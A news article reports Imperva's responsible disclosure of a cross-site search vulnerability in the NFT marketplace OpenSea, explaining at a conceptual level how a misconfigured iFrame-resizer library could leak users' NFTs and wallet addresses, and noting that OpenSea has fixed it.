Imperva uncovers vulnerabilities in NFT marketplace OpenSea
Imperva’s threat team has announced that it has uncovered a vulnerability affecting the largest non-fungible token (NFT) marketplace, OpenSea, worth $13.3 billion.
Imperva researchers demonstrated how an attacker could exploit a cross-site search vulnerability, potentially enabling an attacker to reveal a user’s identity by linking an IP address, a browser session, or an email to a specific NFT and thus a wallet address.
Given the premium placed on anonymity in the NFT realm, this type of exploitation could have seriously affected OpenSea’s business; potentially enabling an attacker to conduct targeted phishing attacks or track which users have purchased high-value NFTs. However, Imperva notified OpenSea of the vulnerability, and the company quickly released an update that limits cross-origin communication, reducing the risk of further exploitation. The Imperva Red Team validated the fix.
Interestingly, the vulnerability was created due to a misconfiguration of the iFrame-resizer open source library used by OpenSea, which allowed the cross-site search vulnerability to exist, leading to the potential exposure of user identities. In particular, the researchers have also established that OpenSea used the search tool ElasticSearch after seeing the company advertise for ElasticSearch skills in a job advertisement.
Cross-site search (XS-Search) is a vulnerability in web applications that use query-based search systems. It allows an attacker to extract sensitive information from another origin by sending queries and observing differences in the behavior of the search system when it does or does not return results. The attacker incrementally collects information by sending multiple queries, using the distinct differences in the system’s behavior to extract more and more information.
OpenSea did not restrict cross-origin communication, which allowed attackers to exploit this vulnerability through cross-site search attacks. The iFrame-resizer library broadcasts the width and height of the page, which can be used as an “oracle” to determine when a given search returns results because the page is smaller when a search returns zero results. By continuously searching the user’s assets, which is done cross-origin through a tab or popup, an attacker can leak the name of an NFT created by the user, thereby revealing their public wallet address. This information can link the user’s identity to the leaked NFT and the public wallet address.
This example highlights the ongoing challenges companies face in ensuring security in increasingly complex application environments, where misconfigurations are easily overlooked and exploited, especially in newer decentralized app environments.
“The world of Web3 and decentralized applications (dApps) is expanding rapidly, bringing with it a host of new opportunities and challenges. As the popularity of dApps increases, so does the potential for security breaches and vulnerabilities,” said Ron Masas, a security researcher at Imperva.
“Recent years have seen several high-profile hacks and vulnerabilities affecting popular Web3 platforms, highlighting the need for developers to prioritize security and privacy. From the infamous DAO hack on the Ethereum blockchain to more recent hacks targeting cross-chain bridging , it is clear that the security of Web3 applications must be a top priority.”
“The vulnerability discovered in OpenSea highlights the dangers of cross-origin communication, which can lead to XS leaks and other vulnerabilities. We appreciate OpenSea’s quick response in addressing the vulnerability and working with us to mitigate it. Our team is dedicated to identifying and reporting vulnerabilities and working with software vendors to improve the safety and security of their platforms,” he concludes.
